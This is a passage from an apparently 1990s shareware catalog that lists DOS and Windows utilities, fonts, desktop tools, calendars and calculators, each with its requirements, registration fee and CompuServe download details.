IBM PC, DOS 2.11 or better. + Registration fee: $12.95 + Registration benefits: Full program functionality; 12 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 12-month free upgrading allowed. + Look for: SSET11.ZIP on BBSs; SSET11.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75122,1275 for + assistance). + SWREG#: 4556 + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + A replacement for the DOS SET command. It lets you: + * Extend environment strings to any arbitrary length. No + more limit of 127 characters for the DOS PATH. + * Modify existing environment strings. + * Save environment snapshot files. Save and Restore your + entire environment in a single command. + * Manipulate Novell Netware drives in the PATH. + * Operate on Parent or Master environment block. + + Chapter 2, "Utilities" 110 + + + + * Display your environment in an easy-to-read format. + + + Product: Win Multiple Configurations + Author: + Version: 6.2 (10-05-94) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; EGA + monitor; Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $18.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 3-month free + upgrading allowed. + Look for: WMC62.ZIP on BBSs (call 602-814-0483 to download it at + no charge); WMC62.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 662 + Download size: 570k (about 43 minutes with a 2400 baud modem) + Description: + Allows up to 100 different Windows configurations to be saved + and restored. Create and save desktops specific for your + children, husband, wife, work partner, etc., or for any special + purposes you wish. Ability to specify files to be included in + each saved configuration. Ability to copy program manager + groups among saved configurations and ability to compress saved + configurations to save disk space. + + + 2.5.6 Recovery utilities + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 438. + + Product: EDDY (EDit DirectorY) [***] + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 13. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 168. + + Chapter 2, "Utilities" 111 + + + + 2.5.7 Fonts + + Product: Fonter + Author: , 805-528-1759 + Version: 6.2 (04-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 5); discounts on upgrades. Lifetime free + upgrading allowed. + Look for: FONTER.ZIP on BBSs (call 805-528-3753 to download it at + no charge); FONTER.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This award-winning program views and prints TT and ATM fonts in + many ways. See font samples, ANSI charts, keyboard display. + Print lists with samples, type specimens, ANSI charts, keyboard + layouts. View font metric details. Preview and install TrueType + fonts too. Save any character as 72 pt. BMP file. This was the + first font viewer for Windows and is still one of the best. + + + 2.5.7.1 PostScript fonts + + Product: CJNFonts + Author: , 718-625-2262 + Version: 1.00 (11-19-94) + Needs: IBM AT (80286), Windows 3.1 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Epson printer. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $1.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 5); + discounts on other products. + Look for: CJNFONT.ZIP on BBSs (call 718-625-0411 to download it + at no charge); CJNFNT.ZIP on CompuServe in CIS:NEWAGE forum + LIBrary 1 (or contact userID 71570,3055 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Truetype and Postscript versions. Fetures several Astrology + fonts and a general commercial symbol font. Contents: + AstGlyph-Astrological Glyphs & Symbols AstPi1--Astrological + Decorative Symbols CJNPI-General symbol font for general use. + + Chapter 2, "Utilities" 112 + + + + Product: RRKeyCapsGerman (PST1) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-GP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2730 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + + Product: RRMacCaps & RRKeySampler (PST1) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-MP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2728 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + 2.5.7.2 TrueType fonts + + Product: CJNFonts + Truetype & Postscript fonts. See full description on page 111. + + Chapter 2, "Utilities" 113 + + + + Product: RISS Font Pak #1 + Author: , 401-767-3106 + Version: 1.3 (02-25-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, fax, BBS, + CompuServe, newsletter, mail support; 3-month return policy; + bonus fonts; all ASP-wide offers (see page 5); discounts on + other products; discounts on upgrades. + Look for: RISSFP1.ZIP on BBSs (call 401-767-3931 to download it + at no charge); RISSF1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 299k (about 22 minutes with a 2400 baud modem) + Description: + A collection of five decorative, specialty TrueType Fonts for + Windows 3.1. These are highly ornamental, original, exciting + fonts guaranteed to spruce up any document! Great for + headlines, and body text alike. Comes complete with fully + automated installation system - just run SETUP and everything + is done for you - it runs on "autopilot" and couldn't be + easier! Includes comprehensive documentation. + + + Product: RRKeyCaps & RRKeySampler (PST1) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-PP2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2726 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + Chapter 2, "Utilities" 114 + + + + Product: RRKeyCaps & RRKeySampler (TT) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-PT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2725 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D PC keycaps (RRKeyCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + Product: RRKeyCapsGerman (TT) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-GT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2729 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D German PC keycaps (RRKeyCapsGerman) and sampler + containing mixture of RRKeyLetters and RRWinSymbols for use in + PC docs. Designed by doc writer. Readable at body text sizes, + mnemonic and easy to use. + + Chapter 2, "Utilities" 115 + + + + Product: RRMacCaps & RRKeySampler (TT) + Author: , 504-928-0780 + Version: 2.0 (07-24-94) + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month return policy; bonus fonts; + all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; RR-MT2.ZIP on CompuServe + in CIS:DTPFORUM forum LIBrary 9 (or contact userID 76436,2426 + for assistance). + SWREG#: 2727 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Complete 2-D Mac keycaps (RRMacCaps) and sampler containing + mixture of RRKeyLetters and RRWinSymbols for use in PC docs. + Designed by doc writer. Readable at body text sizes, mnemonic + and easy to use. + + + 2.5.8 Other + + Product: CD-QUICK Cache + Small TSR makes your CD-ROM drive fast! See full description + on page 75. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 73. + + Product: HandyDOS + Author: + Version: 1.6 (10-22-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM. + Registration fee: $25.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + discounts on upgrades; registration commissions. + Look for: availability unknown on BBSs; HDOS.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 72345,1623 for + assistance). + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + Twelve handy, well written DOS utilities for: file handling + (moving-deleting files & directories, WYSIWYG attribute + changing, etc.); batch programming (pop-up windows, cursor + moving, colour/sound); a stay-in-dos menu system; and a + versatile video & cursor checking/setting utility. A good demo + batch included. + + Chapter 2, "Utilities" 116 + + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: , 203-322-0298 + Version: 3.5 (07-30-94) + Needs: IBM AT (80286), DOS 4.0 or better. 1024k RAM; VGA + monitor. + Registration fee: $20.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, CompuServe, mail support; 3-month return + policy; bonus utilities; all ASP-wide offers (see page 5). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; MEG.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 74213,163 for + assistance); MEG.ZIP on GEnie in PC forum LIBrary 0. + SWREG#: 2259 + PsL#: 11261 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Simplifies your PC space for any disk (floppy, hard, network), + shows space as large easy-to-read pie and 3D graphs. Complete + space information is shown in megabytes. You will see 10 Meg + Free instead of xxx bytes. %Free, free, used and total. CPU + identified (including Pentium) and speed tested to .01 Mhz. + Mouse click to advance to next drive or use autoscan. System + info includes CD-ROM, extended memory, DOS and Windows + versions. Five built in screen savers. + + + 2.6 Desktop utilities + + Product: C-Menu/32 + A stunning easy 32-bit VGA menuing system. See full + description on page 152. + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 363. + + Chapter 2, "Utilities" 117 + + + + Product: Kidproof for Windows [***] + Author: , 408-554-1010 + Version: 1.0 (08-16-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $17.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 5); discounts on upgrades. + Look for: KIDPRO01.ZIP on BBSs (call 800-426-3425 to download it + at no charge); KIDPRO01.EXE on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 74131,2630 for assistance). + SWREG#: 7094 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + An application for kids and parents. It allows you, the parent, + to protect your programs when your child is using your PC. When + you launch it, you are starting a mini-desktop. You add + programs that you want your child to launch. When your child + launches programs, the real desktop, your own, is safe and + secure. Your child will not be able to access anything outside + of Kidproof. + + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 156. + + Product: PCDESK + Author: , 813-447-0604 + Version: 5.4 (09-28-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hard disk. + Strongly recommended: HP LaserJet printer; Mouse; Epson + printer; math coprocessor. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support; 3-month limited return policy. + 3-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: PCDESK54.ZIP on BBSs. + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A highly interactive program that generates Monthly Calendars + and a Weekly Planner to which you can add memo notes. Also + generates Yearly Calendars, and displays an Analog Clock. + Includes an Address Book data base, a DOS File Manager and an + + Chapter 2, "Utilities" 118 + + + + ASCII Text Editor. Mouse supported. Comes with on-line + instructions. + + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 239. + + Product: SensuVoX I + WAV sets to give your PC a Sensual Voice. See full description + on page 173. + + Product: WinCap+ + Powerful Windows(3.1) screen capture utility. See full + description on page 513. + + Product: Winvelope + Envelope printing utility for Windows. See full description on + page 85. + + 2.6.1 Multi-function + + Product: ABcmd + Handy, easy to use, Windows command line. See full description + on page 96. + + Product: AMF Daily Planner & P.I.M. + Author: + Version: 5.0 (08-18-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $21.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: WPIM.ZIP on BBSs; WPIM.ZIP on CompuServe in CIS:WINSHA + forum LIBrary 10 (or contact userID 74250,1700 for assistance). + SWREG#: 3409 + PsL#: 11789 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + This PIM is the easiest by far to use. Calendar and daily + planner/to-do list to the year 9000! Full desktop editor which + allows saves and openings. Phone book and address books store + up to 30,000 entries in a Rolodex look-alike dialog. No + clutter. Easy to use. Full drag & drop interface. Drag & drop + scheduling. Up to 64k data per day. Set up to 1440 alarms per + day. Automated dialing, WinFaxing, Mail Merges, scheduling, + envelope printing, business letter creation, and more! Now with + CallerID. + + + Product: Around The House + Complete personal/home information manager. See full + description on page 138. + + Chapter 2, "Utilities" 119 + + + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 165. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 140. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 141. + + Product: Drag 'n' Drop Utils for Win NT + Author: , 518-438-5548 + Version: 1.42 (09-26-94) + Needs: IBM 80386, Windows NT 3.1 or better. March 1993 beta (or + later) of Windows NT. + Registration fee: $14.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; NTUTIL.ZIP on CompuServe + in CIS:WINNT forum LIBrary 0 (or contact userID 76156,164 for + assistance). + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Native Win32/NT utilities: + PaperDrop drag 'n' drop wallpaper changer + EXEType d'n'd EXE info utility to keep track of all the + EXE types you use with NT + GeneralDrop makes any program a d'n'd + Also digital & analog clocks, quick NT exit/reboot, a File + Manager add-on (with toolbar buttons!), SysInfo, & a drag 'n' + drop file recycler. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 129. + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 38. + + Chapter 2, "Utilities" 120 + + + + Product: Silver Wolf Desktop + Author: + Version: 1.0 (12-12-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of CompuServe, mail support; all ASP-wide offers (see + page 5); discounts on upgrades. + Look for: SW?10.ZIP on BBSs (multiple files) (call 714-376-9240 + to download it at no charge); SW?10.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 9 (multiple files) (or contact + userID 71441,1637 for assistance). + SWREG#: 4130 + Download size: 422k (about 32 minutes with a 2400 baud modem) + Description: + Brings the true, proven, folder/document look & feel to Windows + 3.1 today! Brings you not only the best features of Macintosh & + Windows95, but many other even more intuituve ways to use your + computer. Gives you long filenames, trashcan(delayed( and + immediate delete, icon and text file/directory views, file + finder, a history list of opened files, Program Manager group + access, zip file access, full drag/drop between apps, file + aliases and more! + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 179. + + Product: TMC Calendar & Phone Book + Author: , 612-722-9659 + Version: 2.1 (01-17-93) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; CGA monitor. + Strongly recommended: Hard disk; Modem. + Registration fee: $10.00 + Registration benefits: 12 months of CompuServe, mail support. + Look for: availability unknown on BBSs; TMC21A.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 16 (or contact userID 76470,3424 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Menu driven and extremely easy to use program. Keep notes + about your daily schedule and appointments. Print or export as + ASCII files: calendars, monthly notes, phone & address + directory data and mailing lists. You can even dial phone + numbers right from the directory. While running, helpful + information is displayed along the way and additional + information is accessible just by pressing F1. + + Chapter 2, "Utilities" 121 + + + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 145. + + Product: WinDatCon + Author: + Version: 2.0 (04-18-94) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; VBRUN300.DLL. + Registration fee: $25.00 (add $4.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of CompuServe, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 5). 6-month free upgrading allowed. + Look for: WDC20.ZIP on BBSs; WDC20.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 14 (or contact userID 71302,3436 for assistance). + SWREG#: 2492 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A Windows data conversion program for acceleration, angle, + area, energy, length, power, pressure, speed, temperature, + time, volume and weight. Has many unique features including + pop-up unit definitions, a leap year option, graphical angle + display, calculation of boiling points at specified pressures, + density calculations, and lists of SI prefixes and over 200 + boiling points and densities. A valuable tool for scientists + and students. + + + Product: WinPost + Reminder notes manager for Windows. See full description on + page 146. + + Product: XFile + Author: + Version: 2.00 (03-15-95) + Needs: IBM 80386, Windows 3.1 or better. + Strongly recommended: Hard disk; Mouse. + Registration fee: $18.95 + Registration benefits: 6 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products. 1 free update disk(s) + + Chapter 2, "Utilities" 122 + + + + sent out. May upgrade to Pro version rather than wait for next + release. + Look for: availability unknown on BBSs; XFILE.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 73740,2412 + for assistance). + SWREG#: 5242 + PsL#: 11955 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Low profile multifunctional desktop utility for Windows 3.1. + Features include drag-n-drop file/directory deletion, multi- + drive file finder, program launcher, timed program execution, + unlimited alarms, system resource monitor, free memory monitor, + quick Windows exit, and general system information. Optionally + displays date, time, resources, and free memory. + + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 47. + + 2.6.2 Calculators + + See also: Spreadsheet applications; Mathematics; Finances, + Financial calculators; Business, Business utilities, Weights & + measurements. + + Product: CALC_JNC + Author: , 215-538-7363 + Version: 9.51 (02-20-93) + Needs: IBM PC, DOS 3.0 or better. 58k RAM. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, CompuServe, GEnie, + mail support; 2-month return policy; bonus utilities; all ASP- + wide offers (see page 5). 12-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: CALJNC95.SDN on BBSs (call 215-721-7039 to download it + at no charge); CALJNC.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 6 (or contact userID 76665,3443 for assistance); + CALJNC.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID J.COX32 for assistance). + SWREG#: 187 + PsL#: 10738 + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Automatic conversions between decimal, hex, octal and binary. + Logical operations supported: not, and, nand, or, xor, nor, + neg, rol, ror, modulus. Entry of complex floating point + calculations supported. Logarithms, sin, cos, tan, hyperbolas, + time, fixed, decimal, pi, roots, factorials, and much more. + Other features: + + Chapter 2, "Utilities" 123 + + + + * Load as a TSR + * Displayable memories + * Colors + * Moveable anywhere on screen + * On-line help + * Printer support + * Interactive manual + + + Product: Convert It!(tm) SE [***] + Versatile unit of measure converter. See full description on + page 335. + + Product: Home Refinancing + Compute time value savings from refinancing. See full + description on page 343. + + Product: Judy's TenKey + Author: , 408-244-0744 + Version: 3.0 (10-20-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $2.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; 3-month return policy; bonus + utilities; discounts on other products. + Look for: 10KEY30.ZIP on BBSs; 10KEY.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 17 (or contact userID 70574,2247 for + assistance). + Download size: 188k (about 14 minutes with a 2400 baud modem) + Description: + Powerful Windows calculator with nearly every feature + imaginable, including ascrolling tape you can save, print, + resize, and even edit (causing the tape to automatically + recalculate); selectable syntax (normal, RPN, or tenkey adding + machine); financial dialogs; customizable display; keep on top + option; "Tip of the Day", and much more. You will never go + back to the default Windows calculator. + + + 2.6.3 Calendars + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 137. + + Chapter 2, "Utilities" 124 + + + + Product: Ample Notice + Author: , 704-264-6906 + Version: 3.00 (07-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 + Registration benefits: Printed manual, master disks, future + update, support. + Look for: availability unknown on BBSs; AN300.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 7 (or contact userID 73577,230 for + assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + An appointments calendar/alarm clock package that can help + organize your life. You can easily record birthdays (with ages + updated each year), a meeting every other Tuesday at 4:00 for 5 + meetings, Father's Day (third Sunday in June), and many other + date patterns. + + Appointments automatically set a 'pop-up alarm clock'. + Printouts can be obtained in many styles for reference away + from your computer. Mouse support, help, menus, and + customization. + + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 139. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 140. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 140. + + Product: Dear Diary + Diary/daily journal. See full description on page 150. + + Product: Early Bird + Early Bird. See full description on page 147. + + Product: Family Calendar for Windows + Author: , 970-667-4566 + Version: 1.30 (04-18-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP DeskJet printer; HP LaserJet printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; bonus data; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + + Chapter 2, "Utilities" 125 + + + + Lifetime free upgrading allowed. 12-month bound calendar using + your data. + Look for: FAMCAL13.ZI on BBSs (call 970-663-5507 to download it + at no charge); FAMCAL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72673,357 for assistance). + SWREG#: 4198 + PsL#: 11735 + Download size: 232k (about 17 minutes with a 2400 baud modem) + Description: + Prints family oriented professional quality wall calendars. + Give calendars as annual gifts to family and friends. Make $$$ + yourself printing calendars for others. Also prints unique + (purse or pocket) "shopping list". Supports International date + formats and A4 paper size. Prints formatted and sorted events + list and blank data collection sheets. Supports laser and other + graphic printers, including most dot matrix printers. + + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 533. + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 156. + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 144. + + Product: Personal Schedule + Author: , 913-381-9109 + Version: 1.02 (04-20-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: PRSCD102.ZIP on BBSs. + SWREG#: 5471 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Calendar/schedule/project manager. Personal Schedule manages + personal, family, group, and project calendar schedules, + reminding when tasks are due, and automatically calculating due + dates for recurring tasks. It features both Interactive and + Batch modes. In batch mode (i.e. Autoexec.bat), it will scan + your schedule and pop up a window if it finds a current + uncompleted task. Ideal for work or home. No limit on # of + schedules that can be created. Pull-down menus, dialog boxes, + mouse control. + + Chapter 2, "Utilities" 126 + + + + Product: RagTime for Windows + Author: , 310-866-1932 + Version: 1.0a (10-15-93) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; Hard disk; + Hayes-compatible modem; Mouse. VBRUN300.DLL. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 1 + months of CompuServe, mail support; 1-month return policy; all + ASP-wide offers (see page 5). + Look for: RAGTIME.ZIP on BBSs (call 310-864-3062 to download it + at no charge). + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + As the name implies: it keeps track of a girl's "." Why keep + notes? Why risk a vacation at the wrong time of the month? Why + suffer embarassing questions? Now for the first time, it's easy + to keep track of "it." Keeps track of 3 persons. + + + Product: TASK MASTER + Project tracking program. See full description on page 303. + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 145. + + Product: TC's Toolbox + Nine Windows programs, view files & lots more. See full + description on page 57. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 145. + + Product: x-CAL3 + Network calendar system. See full description on page 378. + + Product: Yellow Sticky for Windows 4.5 [***] + Windows reminder program. See full description on page 148. + + Chapter 2, "Utilities" 127 + + + + 2.6.4 Clocks + + Product: Clickometer + Author: , 808-395-5587 + Version: 1.1 (11-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, CompuServe, mail + support; 1-month return policy; discounts on upgrades. + Look for: CLKMTR11.ZIP on BBSs; CLKMTR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 3941 + PsL#: 11694 + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Knowing when to take a break may help to reduce repetitive- + strain injuries (RSI). This utility counts keystrokes, mouse + clicks, and tracks mouse movement. It issues warning notices + when activity 